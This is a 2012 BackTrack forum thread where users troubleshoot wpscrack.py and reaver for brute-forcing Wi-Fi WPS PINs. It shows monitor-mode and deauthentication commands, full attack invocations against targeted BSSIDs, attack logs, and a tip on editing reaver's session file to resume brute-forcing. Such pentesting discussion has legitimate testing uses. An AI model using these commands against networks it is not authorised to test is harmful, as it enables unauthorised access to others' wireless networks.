=WPSCRACK Thread=

**flatounet** · 10-10-2012, 05:55 AM

hello , after quick search , i dont see any thread about WPSCRACK ,so i made it for this tool.
so im a newbie linux ,but have made few try on BT.

there is my probleme / bug , i made this :

airmon-ng start wlan0
wlan0 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)

airodump-ng mon0 -c 1

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

XX:1B:5E:B5:XX.XX -54 93 2079 37 0 1 54e WPA2 CCMP PSK ESSSID

BSSID STATION PWR Rate Lost Frames Probe

XX:1B:5E:B5:XX:XX YY:E0:C5:04:YY:YY 0 -65 0 - 1 0 8

(i got association ,and AP is WPS (tryed with reaver & FERN)

so i start attack on it :

./wpscrack.py --iface=mon0 --client YY:E0:C5:04:YY:YY --bssid XX:1B:5E:B5:XX:XX --ssid ESSSID --dh 0 -v

and i got this error :

WARNING: No route found for IPv6 destination :: (no default route?)
sniffer started
Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python2.6/threading.py", line 532, in __bootstrap_inner
self.run()
File "/usr/lib/python2.6/threading.py", line 484, in run
self.__target(*self.__args, **self.__kwargs)
File "./wpscrack.py", line 516, in sniffer
sniff(store=0, stop_filter=lambda x: self.sniffer_filter(x))
File "/usr/lib/pymodules/python2.6/scapy/sendrecv.py", line 534, in sniff
s = L2socket(type=ETH_P_ALL, *arg, **karg)
TypeError: __init__() got an unexpected keyword argument 'stop_filter'

------------------- attempt #1
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.062 seconds
------------------- attempt #2
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.054 seconds

this attack work with fern & reaver , but i cant resume manually
and her auto save , dont work fine here (work 1 time ,at 2th stop attack restart to begin .... )

any one have idea about where come the probleme ?

wpscrack.py file is copyed in home floder
permissions : owner : root
acces : read & write
group : root
acces : read & write
others
acces : read & write
execute : allow executing file as program

(sorry im a newbie on linux ,all help or idea are welcome here

)

**zimmaro** · 10-10-2012, 12:31 PM

hi

Step 2 you link that helped ME to solve in my bt5-r3 ((many thanks to authors))
for good scapy install..... scapy 2.2.0:

http://trac.secdev.org/scapy/ticket/771 (This is perhaps not needed .. I do not know) for cert.py

for wpscrack.py...:

http://www.hack4fun.eu/2012/01/reaver-wps-wpscrack/ #traslate of czech republic

this is my bt5-r3:

root@bt:~/wpscrack# ./wpscrack.py --help
Usage: wpscrack.py --iface=IFACE --client=CLIENT_MAC --bssid=BSSID --ssid=SSID [optional arguments]

Options:
-h, --help show this help message and exit
-i IFACE, --iface=IFACE
network interface (monitor mode)
-c CLIENT_MAC, --client=CLIENT_MAC
MAC of client interface
-b BSSID, --bssid=BSSID
MAC of AP (BSSID)
-s SSID, --ssid=SSID SSID of AP (ESSID)
--dh=DH_SECRET diffie-hellman secret number
-t TIMEOUT, --timeout=TIMEOUT
timemout in seconds
-p START_PIN, --pin=START_PIN
start pin for brute force
-v, --verbose verbose

root@bt:~/wpscrack# ./wpscrack.py --iface=mon0 --client B8:xF:6x:AC:xx:02 --bssid 00:1x:6x:A6:Ax:04 --ssid Alice-78x9xxx4 --dh 0 -v
sniffer started
------------------- attempt #1
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.131 seconds
------------------- attempt #2
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.060 seconds
------------------- attempt #3
Trying 00000001
-> 802.11 deauthentication
-> 802.11 authentication request
.............................
..............................................
.................................................. ............
bye

**hannah** · 10-10-2012, 03:12 PM

To me it feels like reinventing the wheel..if you really like to crack WPS..reaver is the original tool and fully customizable. Yes you can start from any pin you want. You just need to edit the db file (.wpc) located here:

/usr/local/etc/reaver/AAAAAAAA.wpc

If You like to crack WPS in a fully automated way then you can use wifite tool located here:
root@bt:/pentest/wireless/wifite# (in BT5 R3)

Hope this helps.

**flatounet** · 10-11-2012, 04:54 AM

i have found reaver floder ;
usr / local / ect / reaver

i have the file name 84XXXXXXX8.wpc

but i have all tryied pin in ;

if i put a pin like 7400 and save ,reaver resume at 7400 ??
or retry all exept 7400 ?

i have retry my network testing , im at 25.36% (36h running)
and dont really want to restart from 0 ....

**hannah** · 10-11-2012, 02:48 PM

Please look here:
http://code.google.com/p/reaver-wps/issues/list

Troll through this list and you will find your answer. This is how I found answers to my queries.

**wewe73** · 10-11-2012, 04:03 PM

Originally Posted by flatounet

i have found reaver floder ;
usr / local / ect / reaver

i have the file name 84XXXXXXX8.wpc

but i have all tryied pin in ;

if i put a pin like 7400 and save ,reaver resume at 7400 ??
or retry all exept 7400 ?

i have retry my network testing , im at 25.36% (36h running)
and dont really want to restart from 0 ....

if you want to restart reaver from 7400 you will have to edit the file and put 7405 at the top and save it, reaver then will restart from 7004 7005 7006 7007 and so on,

BackTrack Linux - Penetration Testing Distribution

Thread: =WPSCRACK Thread=

Thread Tools

Search Thread

Display

=WPSCRACK Thread=

Re: =WPSCRACK Thread=

Re: =WPSCRACK Thread=

Re: =WPSCRACK Thread=

Re: =WPSCRACK Thread=

Re: =WPSCRACK Thread=

Posting Permissions